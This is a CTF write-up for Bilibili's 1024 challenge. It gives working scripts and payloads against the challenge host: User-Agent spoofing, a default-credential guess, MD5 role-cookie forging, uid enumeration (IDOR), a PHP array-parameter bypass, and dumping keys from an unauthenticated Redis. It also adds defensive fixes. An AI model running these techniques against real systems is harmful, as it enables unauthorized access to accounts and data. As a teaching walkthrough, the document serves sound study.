Bilibili Programmer's Day (1024) CTF
0x00
The challenge numbering starts at 1, so there is no 0x00. Skipped.
0x01 & 0x02
Inspecting the page source shows the two calls that populate the flags:

```html
<script>
$.ajax({
    url: "api/admin",
    type: "get",
    success: function (data) {
        if (data.code == 200) {
            var input = document.getElementById("flag1");
            input.value = String(data.data);
        } else {
            $('#flag1').html("接口异常,请稍后再试~");   // "API error, try again later"
        }
    }
})
</script>
<script>
$.ajax({
    url: "api/ctf/2",
    type: "get",
    success: function (data) {
        if (data.code == 200) {
            $('#flag2').html("flag2: " + data.data);
        } else {
            // "must be visited with the bilibili Security Browser"
            $('#flag2').html("需要使用bilibili Security Browser浏览器访问~");
        }
    }
})
</script>
```
First, request http://45.113.201.36/api/admin directly to complete the check-in (0x01).
Then request http://45.113.201.36/api/ctf/2, intercept it in a proxy and change the User-Agent header to `bilibili Security Browser`; the error string in the JS gives the expected value away, and since the User-Agent is fully client-controlled the server-side check is no access control at all. That returns the flag (0x02).
0x03
Looking at the HTML:

```html
<script>
$("#submit").click(function () {
    $.ajax({
        url: "api/ctf/3",
        type: "post",
        contentType: "application/json",
        dataType: "json",
        data: JSON.stringify({
            username: $("#name").val(),
            passwd: $("#subject").val(),
        }),
        success: function (data) {
            if (data.code == 200) {
                alert("flag is: " + data.data);
            } else {
                alert("用户名或密码错误~");   // "wrong username or password"
            }
        }
    })
});
</script>
```
Nothing looks wrong on the client side, so the next step is basic SQL injection against the JSON login...
None of the usual injection variants work, so I gave up on that route.
The answer turned out to be a plain default credential guess: admin/bilibili.
0x04
Intercepting the request to the API shows:

```http
GET /api/ctf/4 HTTP/1.1
Host: 45.113.201.36
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://45.113.201.36/superadmin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: session=eyJ1aWQiOiIyNjE4MjIifQ.X5Obkg.djkuPlz_wwtba7F-BHsM4lL7W54; role=ee11cbb19052e40b07aac0ca060c23ee
Connection: close
```
The `role` cookie is a 32-hex-character value; a quick Baidu search (or a hash lookup) identifies it as an unsalted MD5:

```python
In [2]: md5("user".encode("utf8")).hexdigest()
Out[2]: 'ee11cbb19052e40b07aac0ca060c23ee'
```
So the role is carried client-side as `md5(role_name)`, with no key, no salt and no binding to the session. Next, try the MD5 of various privileged role names (note that the script sends a dummy `session` value and the server accepts it anyway):
```python
import requests
from hashlib import md5


def send_payload(payload):
    cookies = {
        # dummy session: the endpoint never checks it, only the role hash matters
        'session': 'seeeeeeeeeeeeeeeession',
        'role': md5(payload.encode("utf8")).hexdigest(),
    }
    headers = {
        'Proxy-Connection': 'keep-alive',
        'Accept': '*/*',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'http://45.113.201.36/superadmin.html',
        'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
    }
    response = requests.get('http://45.113.201.36/api/ctf/4', headers=headers, cookies=cookies, verify=False)
    return response


fuzz_list = [
    "admin", "superadmin", "SuperAdmin", "bilibili", "root",
    "管理员", "超级管理员", "chaojiguanliyuan",
    "bilibiliadmin", "bilibilisuperadmin", "supervisor",
    "administrator", "superadministrator", "chenrui",
]
# also try the Capitalized form of every candidate
fuzz_list.extend([s.capitalize() for s in fuzz_list])

for f in fuzz_list:
    r = send_payload(f)
    print(f"{f:>18}", r.text)
```
Which yields one hit:

```
     Administrator {"code":200,"data":"flag","msg":""}
```
Nice! `role=md5("Administrator")` is all it takes to become super admin.
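As an added example (my code, not the author's script or the challenge's own code), the following takes the two cookies from the captured request apart offline. The `session` cookie is a Flask/itsdangerous token of the form `payload.timestamp.signature`: only forging the signature needs the server's SECRET_KEY, the JSON payload and signing time are readable by anyone holding the cookie. The `role` cookie is an unkeyed, unsalted MD5 of a short word, which a wordlist recovers instantly. The `sign_role`/`verify_role` pair at the end is a hypothetical fix showing how a role claim should be bound to the session's uid under a server-side key; the key `b"server-secret"` and the `ROLE_WORDS` list are constructed here.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Cookie values from the captured request above.
SESSION_COOKIE = "eyJ1aWQiOiIyNjE4MjIifQ.X5Obkg.djkuPlz_wwtba7F-BHsM4lL7W54"
ROLE_COOKIE = "ee11cbb19052e40b07aac0ca060c23ee"


def _b64decode(part):
    """itsdangerous strips '=' padding from urlsafe base64; restore it before decoding."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def decode_flask_session(cookie):
    """Read a Flask session cookie without SECRET_KEY.

    Layout is <payload>.<timestamp>.<signature>. Only verifying or forging the
    signature needs the key; the payload (JSON) and the signing time are
    plaintext to anyone who holds the cookie.
    """
    compressed = cookie.startswith(".")        # Flask zlib-compresses large payloads
    payload, timestamp, signature = cookie.lstrip(".").split(".")
    raw = _b64decode(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return {
        "data": json.loads(raw),
        # itsdangerous 1.0+ stores plain Unix time as a big-endian integer
        "timestamp": int.from_bytes(_b64decode(timestamp), "big"),
        # 20 bytes means HMAC-SHA1, Flask's default session signer
        "signature_len": len(_b64decode(signature)),
    }


# constructed wordlist; the author's fuzz list above is the CTF-specific version
ROLE_WORDS = ["user", "guest", "admin", "superadmin", "administrator", "root"]


def role_candidates(words):
    """Generate the case variants the fuzz script above listed by hand."""
    out = []
    for w in words:
        for v in (w, w.lower(), w.capitalize(), w.upper()):
            if v not in out:
                out.append(v)
    return out


def crack_role_hash(hex_digest, candidates):
    """Unkeyed, unsalted MD5 of a short role name falls to a wordlist instantly."""
    for word in candidates:
        if hashlib.md5(word.encode("utf8")).hexdigest() == hex_digest:
            return word
    return None


def sign_role(role, uid, key):
    """Hypothetical fix: bind the role to the session's uid under a server-side key."""
    return hmac.new(key, f"{uid}:{role}".encode(), hashlib.sha256).hexdigest()


def verify_role(role, uid, key, tag):
    """Constant-time check; a client that renames its role no longer has a valid tag."""
    return hmac.compare_digest(sign_role(role, uid, key), tag)


if __name__ == "__main__":
    sess = decode_flask_session(SESSION_COOKIE)
    print("session:", sess)
    print("role cookie = md5 of:", crack_role_hash(ROLE_COOKIE, role_candidates(ROLE_WORDS)))
    key = b"server-secret"  # constructed; a real key lives only on the server
    tag = sign_role("user", sess["data"]["uid"], key)
    print("forged Administrator accepted?", verify_role("Administrator", sess["data"]["uid"], key, tag))
```

The decoded session payload is `{"uid": "261822"}` and the timestamp falls on 2020-10-24 (the contest day), which is why the author did not bother attacking the session cookie: with no key there is nothing to forge. The role cookie is the weak link because any client can compute `md5("Administrator")` itself; even a keyed hash would still be forgeable if the server did not also tie it to the uid, which is what `sign_role` does.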
0x05
Code review time:

```javascript
$(function () {
    (function ($) {
        // read ?name=value from the query string
        $.getUrlParam = function (name) {
            var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
            var r = window.location.search.substr(1).match(reg);
            if (r != null) return unescape(r[2]);
            return null;
        }
    })(jQuery);

    var uid = $.getUrlParam('uid');
    if (uid == null) {
        uid = 100336889;   // default uid, used as the starting point below
    }
    $.ajax({
        url: "api/ctf/5?uid=" + uid,
        type: "get",
        success: function (data) {
            console.log(data);
            if (data.code == 200) {
                $('#flag').html("欢迎超级管理员登陆~flag : " + data.data)   // "welcome, super admin"
            } else {
                $('#flag').html("这里没有你想要的答案~")   // "nothing for you here"
            }
        }
    })
});
```
The `uid` is passed straight through to the API and nothing in the code says which uid is the super admin, so this is a plain IDOR: enumerate uids blindly, starting from the default 100336889.
Slightly modify the script from 0x04:
```python
import requests


def send_payload(payload):
    cookies = {
        'session': 'eyJ1aWQiOiIyNjE4MjIifQ.X5Obkg.djkuPlz_wwtba7F-BHsM4lL7W54',
    }
    headers = {
        'Proxy-Connection': 'keep-alive',
        'Accept': '*/*',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'http://45.113.201.36/superadmin.html',
        'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
    }
    response = requests.get('http://45.113.201.36/api/ctf/5?uid={}'.format(payload), headers=headers, cookies=cookies, verify=False)
    return response


# walk 10000 uids upward from the page's default; only a non-empty data field is interesting
for f in range(100336889, 100336889 + 10000):
    r = send_payload(f)
    rj = r.json()
    if rj["data"]:
        print(f"{f:>5}", rj)
print("finish")
```
Then just wait for a hit.
0x06
There is nothing worth auditing in the page's code this time.
The page is titled Black & White, and the only input that gets any validation is the email field, so my first guess was an XSS there.
Build a payload...
...build what, exactly. That lead goes nowhere.
Running a directory scan with 御剑 (Yujian) instead turns up two files: test.php and end.php.
test.php serves a JSFuck-encoded blob; decoding it gives
```javascript
var str1 = "\u7a0b\u5e8f\u5458\u6700\u591a\u7684\u5730\u65b9";
var str2 = "bilibili1024havefun";
console.log()
```

and `str1` unescapes to:

```
"\u7a0b\u5e8f\u5458\u6700\u591a\u7684\u5730\u65b9"
"程序员最多的地方"   // "the place with the most programmers"
```
Right, "the place with the most programmers" is GitHub. Searching GitHub for `bilibili1024havefun` turns up the source of end.php:

```php
<?php
$bilibili = "bilibili1024havefun";
$str = intval($_GET['id']);
$reg = preg_match('/\d/is', $_GET['id']);
if (!is_numeric($_GET['id']) and $reg !== 1 and $str === 1) {
    $content = file_get_contents($_GET['url']);
    if (false) {
        echo "还差一点点啦~";        // "almost there"
    } else {
        echo $flag;
    }
} else {
    echo "你想要的不在这儿~";      // "what you want is not here"
}
?>
```
The `id` parameter has to satisfy three conditions at once: `is_numeric()` must be false, `preg_match('/\d/')` must not return 1 (so no digit may match), and `intval()` must return exactly 1. No scalar string can do all three, since anything `intval()` turns into 1 contains a digit that the regex catches. An array can: `is_numeric()` is false for arrays, `preg_match()` given an array as the subject returns false with a warning under PHP 7 (so `$reg !== 1` holds), and the PHP manual documents `intval()` of a non-empty array as 1:

```php
echo intval(array());             // 0
echo intval(array('foo', 'bar')); // 1
```

So the payload is `id[]=1&id[]=2` (a single `id[]=1` would do as well; only non-emptiness matters). Note also that the leaked source never looks at what `file_get_contents($_GET['url'])` returned: the `if (false)` branch is dead, so once the `id` checks pass the script always reaches `echo $flag`.
Next, guess the path `/api/ctf/6/flag.txt` for the `url` parameter (don't ask how; out-of-band guessing is part of any CTF).
That returns the flag file name bilibili_224a634752448def6c0ec064e49fe797_havefun.jpg.
Opening it as a text file gives ...{flag10:2ebd3b08-47ffc478-b49a5f9d-f6099d65}
That is the flag for challenge 10, not 6.
Wild.
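As an added example (my code, not the author's script or the challenge's code), here is a small Python builder for the end.php request that makes the PHP-array trick explicit: `id[]` is what turns `$_GET['id']` into an array on the server, and it has to be percent-encoded as `id%5B%5D` on the wire. The `fetch` callable is injected so the logic runs offline against a constructed stand-in that mirrors the leaked end.php conditions; the host and `end.php` come from the page, `/api/ctf/6/flag.txt` is the path the author guessed, and `FLAG_PLACEHOLDER` is a made-up response.

```python
from urllib.parse import urlencode

# end.php was found by the directory scan; the host is the challenge box from the write-up
END_PHP = "http://45.113.201.36/end.php"


def build_end_php_query(url_param):
    """Query string that satisfies end.php's three checks on $_GET['id'].

    Sending id[]=... makes PHP build an array for $_GET['id']:
      - is_numeric(array)           -> false
      - preg_match('/\\d/', array)  -> false (warning under PHP 7), so $reg !== 1
      - intval(non-empty array)     -> 1, so $str === 1
    A scalar can never pass all three: any string intval() turns into 1 holds a digit.
    """
    params = [("id[]", "1"), ("id[]", "2"), ("url", url_param)]
    # keep '/' and ':' readable; '[' and ']' are percent-encoded and PHP decodes them back
    return urlencode(params, safe="/:")


def exploit_end_php(url_param, fetch):
    """Build the full URL and hand it to fetch(url) -> body; fetch is injected for offline tests."""
    full_url = f"{END_PHP}?{build_end_php_query(url_param)}"
    return full_url, fetch(full_url)


def fake_end_php(full_url):
    """Constructed stand-in for the real server, mirroring the leaked end.php logic.

    With id[] present the three PHP conditions pass and the flag is echoed no matter
    what file_get_contents($_GET['url']) returned, because the 'if (false)' branch is dead.
    """
    query = full_url.split("?", 1)[1] if "?" in full_url else ""
    return "FLAG_PLACEHOLDER" if "id%5B%5D=" in query else "你想要的不在这儿~"


if __name__ == "__main__":
    url, body = exploit_end_php("/api/ctf/6/flag.txt", fake_end_php)
    print(url)
    print(body)
```

Against the live box the same call would be `exploit_end_php("/api/ctf/6/flag.txt", lambda u: requests.get(u).text)`; the point of the injected `fetch` is that the payload construction, which is where the trick lives, can be checked without a network.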
0x07
From challenge 7 onward there is no challenge page at all, only this hint:
"Young one, you'll have to explore on your own~"
Oh.
Reportedly the answers to the last four challenges are all hidden somewhere in challenge 6, which left me rather lost.
0x08
Port-scanning the challenge 6 host turns up a Redis instance. Connecting to it needs no password (no `requirepass` set), the flag for challenge 8 is sitting in the database, done.
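Added example (my code, not the author's and not part of the challenge), showing what "connect in, no password" amounts to on the wire: a minimal RESP2 encoder and parser plus a raw-socket `redis_call`, enough to run `INFO` or `KEYS *` against an unauthenticated Redis without a client library. The host is the challenge box from the write-up; port 6379 and the commands in the usage are assumptions, and the replies in the test are constructed. An instance that does require a password answers `-NOAUTH Authentication required.`, which this code surfaces as a `RuntimeError`.

```python
import socket

HOST, PORT = "45.113.201.36", 6379   # host from the page; port is assumed (Redis default)


class Incomplete(Exception):
    """Raised when the buffer does not yet hold a whole reply."""


def encode_command(*args):
    """Serialise a command as a RESP array of bulk strings, exactly as redis-cli does."""
    parts = [b"*%d\r\n" % len(args)]
    for a in args:
        a = a if isinstance(a, bytes) else str(a).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(a), a))
    return b"".join(parts)


def parse_reply(buf):
    """Parse one RESP2 reply; return (value, unconsumed_bytes) or raise Incomplete."""
    if not buf:
        raise Incomplete
    kind, body = buf[:1], buf[1:]
    line, sep, rest = body.partition(b"\r\n")
    if not sep:
        raise Incomplete
    if kind == b"+":                       # simple string, e.g. +OK
        return line, rest
    if kind == b"-":                       # error, e.g. -NOAUTH Authentication required.
        raise RuntimeError(line.decode())
    if kind == b":":                       # integer
        return int(line), rest
    if kind == b"$":                       # bulk string; $-1 is nil
        n = int(line)
        if n == -1:
            return None, rest
        if len(rest) < n + 2:
            raise Incomplete
        return rest[:n], rest[n + 2:]
    if kind == b"*":                       # array, elements parsed recursively
        n = int(line)
        if n == -1:
            return None, rest
        items = []
        for _ in range(n):
            item, rest = parse_reply(rest)
            items.append(item)
        return items, rest
    raise ValueError("unknown RESP type %r" % kind)


def is_complete(buf):
    """True if buf holds at least one full reply (an error reply counts as complete)."""
    try:
        parse_reply(buf)
    except Incomplete:
        return False
    except RuntimeError:
        return True
    return True


def redis_call(host, port, *args, timeout=5):
    """Send one command over a raw socket and return the parsed reply.

    No AUTH is attempted: on a misconfigured instance like the one in the write-up
    this just works; a protected one raises RuntimeError('NOAUTH ...').
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(encode_command(*args))
        buf = b""
        while True:
            chunk = s.recv(65536)
            if not chunk:
                raise ConnectionError("server closed connection mid-reply")
            buf += chunk
            try:
                value, _ = parse_reply(buf)
                return value
            except Incomplete:
                continue          # reply spans several TCP segments; keep reading


if __name__ == "__main__":
    print(redis_call(HOST, PORT, "INFO", "server")[:200])
    for key in redis_call(HOST, PORT, "KEYS", "*"):   # fine on a tiny CTF instance, not in prod
        print(key, redis_call(HOST, PORT, "TYPE", key))
```

The loop in `redis_call` matters for `INFO` and large `KEYS` results, which do not arrive in one `recv()`; the parser signals `Incomplete` rather than returning a truncated bulk string. The underlying lesson of 0x08 is the usual one: Redis has no authentication unless `requirepass` is set, and it should never be reachable from outside the host or its private network.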
0x09
No idea what this one is.
0x10
Already stumbled on this one by accident while solving challenge 6 (the flag10 value above).